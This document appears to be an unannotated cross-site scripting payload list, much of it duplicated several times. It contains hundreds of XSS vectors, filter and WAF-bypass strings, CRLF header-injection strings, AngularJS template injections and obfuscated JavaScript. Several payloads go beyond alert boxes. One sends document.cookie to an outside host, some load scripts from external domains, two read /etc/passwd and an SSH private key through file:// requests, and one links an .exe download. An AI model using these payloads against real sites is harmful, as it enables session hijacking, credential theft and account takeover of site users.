%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
""><body/oNpagEshoW=(confirm)(document.domain)>
<script>var{a:onerror}={a:alert};throw 1</script>
""><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> 
<img src=x onerror=prompt()> 
%20<script>prompt(document.domain)</script>
""><img src=x onerror=prompt(document.cookie);>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script> 
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
""><img src=x\%28\%29\ onerror=prompt(document.domain);>
%20"><img src=q onerror=alert(1)> 
<><img src=1 onerror=alert(1)> 
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
<script>alert(1234)</script> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(Strin
g.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'\u003E'\u0022><script>alert(2);</script> 
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<script charset="\x22>javascript:alert(1)</script>
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
<p><img/src/onerror=alert(`ibro`)></p> 
'><script>alert(123)</script> 
/><svg src=x onload=confirm(document.domain);>
'>'+'><script>alert(2);</script> 
"<script>1-confirm(0);</script>"/> 
>"'><script>alert(2);</script> 
"></tag><svg onload=alert(1)> 
""><img src=a onerror=alert(document.location)>
<script>top[`alert`]()</script> 
""><img src=x onerror=(prompt(document.domain));>
<script>javascript:alert(1)</script> 
"/><script>+-+-1-+-+confirm(1)</script> 
<! foo="><script>javascript:alert(1)</script>">
""><img src=x onerror=alert(1);> 
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<script>alert(1)</script> 
%27%3E'><script>alert(2);</script> 
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
%3F%20"><img src=q onerror=alert(1)> 
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<?tag x="-->" test="<img src=x onerror=alert(1)//">
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
""><body/oNpagEshoW=(confirm)(document.domain)>
<script>var{a:onerror}={a:alert};throw 1</script>
""><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 
101))</script> 
<img src=x onerror=prompt()> 
%20<script>prompt(document.domain)</script>
""><img src=x onerror=prompt(document.cookie);>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script> 
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
""><img src=x\%28\%29\ onerror=prompt(document.domain);>
%20"><img src=q onerror=alert(1)> 
<><img src=1 onerror=alert(1)> 
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
<script>alert(1234)</script> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(Strin
g.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'\u003E'\u0022><script>alert(2);</script> 
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<script charset="\x22>javascript:alert(1)</script>
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
<p><img/src/onerror=alert(`ibro`)></p> 
'><script>alert(123)</script> 
/><svg src=x onload=confirm(document.domain);>
'>'+'><script>alert(2);</script> 
"<script>1-confirm(0);</script>"/> 
>"'><script>alert(2);</script> 
"></tag><svg onload=alert(1)> 
""><img src=a onerror=alert(document.location)>
<script>top[`alert`]()</script> 
""><img src=x onerror=(prompt(document.domain));>
<script>javascript:alert(1)</script> 
"/><script>+-+-1-+-+confirm(1)</script> 
<! foo="><script>javascript:alert(1)</script>">
""><img src=x onerror=alert(1);> 
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<script>alert(1)</script> 
%27%3E'><script>alert(2);</script> 
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
%3F%20"><img src=q onerror=alert(1)> 
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<?tag x="-->" test="<img src=x onerror=alert(1)//">
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
""><body/oNpagEshoW=(confirm)(document.domain)>
<script>var{a:onerror}={a:alert};throw 1</script>
""><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> 
<img src=x onerror=prompt()> 
%20<script>prompt(document.domain)</script>
""><img src=x onerror=prompt(document.cookie);>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script> 
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
""><img src=x\%28\%29\ onerror=prompt(document.domain);>
%20"><img src=q onerror=alert(1)> 
<><img src=1 onerror=alert(1)> 
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--
%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--
<script>alert(1234)</script> 
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCo
de(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'\u003E'\u0022><script>alert(2);</script> 
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<script charset="\x22>javascript:alert(1)</script>
'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'
<p><img/src/onerror=alert(`ibro`)></p> 
'><script>alert(123)</script> 
/><svg src=x onload=confirm(document.domain);>
'>'+'><script>alert(2);</script> 
"<script>1-confirm(0);</script>"/> 
>"'><script>alert(2);</script> 
"></tag><svg onload=alert(1)> 
""><img src=a onerror=alert(document.location)>
<script>top[`alert`]()</script> 
""><img src=x onerror=(prompt(document.domain));>
<script>javascript:alert(1)</script> 
"/><script>+-+-1-+-+confirm(1)</script> 
<! foo="><script>javascript:alert(1)</script>">
""><img src=x onerror=alert(1);> 
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<script>alert(1)</script> 
%27%3E'><script>alert(2);</script> 
<![><img src="]><img src=x onerror=javascript:alert(/AmoloHT/)//">
%3F%20"><img src=q onerror=alert(1)> 
/*\"<sVg/oNloAd=alert(document.domain)//>\x3e
<?tag x="-->" test="<img src=x onerror=alert(1)//">
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
%E5%98%8D%E5%98%8ASet Cookie:whoami=thecyberneh%0d%0a%0d%0a%0d%0a%0d%0a%3Cscript%3Ealert(1);%3C/script%3E
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x onerror=alert(document.domain)>
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
""><body/oNpagEshoW=(confirm)(document.domain)>
<script>var{a:onerror}={a:alert};throw 1</script>
""><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 
101))</script> 
<img src=x onerror=prompt()> 
%20<script>prompt(document.domain)</script>
""><img src=x onerror=prompt(document.cookie);>
%E5%98%8D%E5%98%8A%20<script>alert(1)</script> 
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x 
onerror=javascript:alert(`cloudfrontbypass`)//'> 
page=1"><Svg Only=1 OnLoad=confirm(document.domain)>
""><img src=x\%28\%29\ onerror=prompt(document.domain);>
%20"><img src=q onerror=alert(1)> 
<svg	onload=alert(1)><svg> 
<svgonload=alert(1)><svg><body onload=alert()>
<img src=x onerror=alert()>
<svg onload=alert()>
<body onpageshow=alert(1)>
<div style="width:1000px;height:1000px" onmouseover=alert()></div>
<marquee width=10 loop=2 behavior="alternate" onbounce=alert()> 
<marquee onstart=alert(1)> (firefox only)
<marquee loop=1 width=0 onfinish=alert(1)> 
<video autoplay onloadstart="alert()" src=x></video>
<video autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadeddata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadedmetadata="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadstart="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<video controls onloadstart="alert()"><source src=x></video>
<video controls oncanplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></video>
<audio autoplay controls onplay="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<audio autoplay controls onplaying="alert()"><source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4"></audio>
<style>@keyframes x {}</style>
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
<svg><animate onbegin=alert() attributeName=x></svg>
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="[JS-F**k Payload]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[JS-F**k Payload]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%25 23x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%25 26%2523x29%3B%22%3E
<img/src="x"/onerror="[JS-F**K Payload]">
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';><img/src=q onerror='new Function`al\ert\`1\``'>
<svg·onload=alert(1)>
<sCRipT>alert(1)</sCRipT>
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
onerror=alert;throw 1
/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('import("https://six2dez.xss.ht")')()}}
{{$on.constructor('alert(1)')()}}
{{{}.")));alert(1)//"}}
{{{}.")));alert(1)//"}}
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,11 4,116,40,49,41)
/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
"><svg onload=alert(1)>
javascript:alert(document.cookie)
\"-alert(1)}//
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
<svg onload=alert(1)>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<svg/1='&q='onload=alert(1)>
<svg 1='&q='onload='/*&r=*/alert(1)'>
<script/&q=/src=data:&q=alert(1)>
<script src=data:,alert(1)>
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmai... formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(document.domain)//'>
javascript:alert();//<img src=x:x onerror=alert(1)>\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--></title></textarea></style></noscript></noembed></template></select></script><frame src=javascript:alert()><svg onload=alert()><!--
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmai... formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 
  ```
%3C!%27/!%22/!\%27/\%22/ — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm1%20//%3E#
<!'/!”/!\'/\"/ — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm1 //>#
jaVasCript:/-//*\/'/"/*/(/ */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e
” ></plaintext></|><plaintext/onmouseover=prompt(1) >prompt(1)@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” > "></script>alert(1)”><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">">
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
?msg=<img/src=`%00`%20onerror=this.onerror=confirm(1)
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”> <iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouse over=prompt(1)><script>prompt(1)... formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><imgsrc="http://i.imgur.com/P8mL8.jpg">
<input autofocus="" onfocus=alert(1)></input>
<details open ontoggle="alert()">  
<ScRiPt>alert(1)</ScRiPt
<math><a xlink:href="//evil.com/">click
window.alert&#40;/xss-by-tarun/&#41;"
<math><a xlink:href:"//sciensec.github.io/evil.exe">Klik Disini
%22/%3E%3CBODY%20onload= document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22) %3E
<scrscriptipt>alert(1)</scrscriptipt>
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
<svg/onload=window["al"+"ert"]1337>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
"-(alert)(1)-"
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
<svg onload='new Function["Y000!"].find(al\u0065rt)'>
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
lert&#x000000028;origin&#x000029;>
/(A(%22onerror='alert%60123%60'test))/
<Svg On Only=1 Onload=alert(1337)>
<=script>=alert("hacked")<=/scirpt>=
"accesskey='x' onclick='confirm`1`' //
“><a href=”#” onmouseleave=alert(99)>Click
?dir=%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E]
1<DETAILS open onToggle=a=prompt,a()%20x>
open onToggle=a=prompt,a()%20x
a=prompt,a()%20x“><img src=x onerror=this.src=’https://herroid1337.000webhostapp.com/m.php?cok='+document.cookie>
%3Ca%20href%3d%22j%26Tab%3ba%26Tab%3bv%26Tab%3basc%26NewLine%3bri%26Tab%3bpt%26colon%3b%26lpar%3bp%26Tab%3br%26Tab%3bo%26Tab%3bm%26Tab%3bp%26Tab%3bt%26Tab%3b%28document.domain%29%26rpar%3b%22%3ECLICK
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)>
ab@gmail.com'\"><svg/onload=aler...>
ab@gmail.com"><script>alert(1)</...>
http://example.com/services"><sc...
KaOdcRYSw6jhu"><script>alert(document.domain)</script>vzsui
%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e
><script%20>alert(document.domain)<%2fscript>
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert&#0000000040document.cookie)>
<svg onload=alert&#0000000040"1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm&#0000000040document.domain)
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)> 
- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
">%20<img src=o onerror=alert``>//
">-setTimeout`\u0028alert(1)\u0029`-'
'<00 foo="<a%20href="javascript:alert('xss')">xss-click</00>--%20/
'"><img src=x onerror=alert("xss!")>.pdf
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
"><track/onerror='confirm`1`'>
%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('‏0f')">
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
<sCrIpT>(function(){var a=[97,108,101,114,116];var
b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>
<DiV sTylE="WidTH:100&#37;;HeIgHt:100vH&#59;" oNpOINteROvEr="var _0x1abc=['\x63','\x6F','\x6E','\x73','\x74','\x72','\x75','\x63','\x74','\x6F','\x72'];var _0x2bcd=['\x61','\x6C','\x65','\x72','\x74','\x28','\x64','\x6F','\x63','\x75','\x6D','\x65','\x6E','\x74','\x2E','\x64','\x6F','\x6D','\x61','\x69','\x6E','\x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg onload="alert(1)"></svg>
jaVasCript:/*-/*`/*\`/*'/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*&#x252f;&#x252a;prompt(1)&#x252f;&#x253b;/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//
<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x>
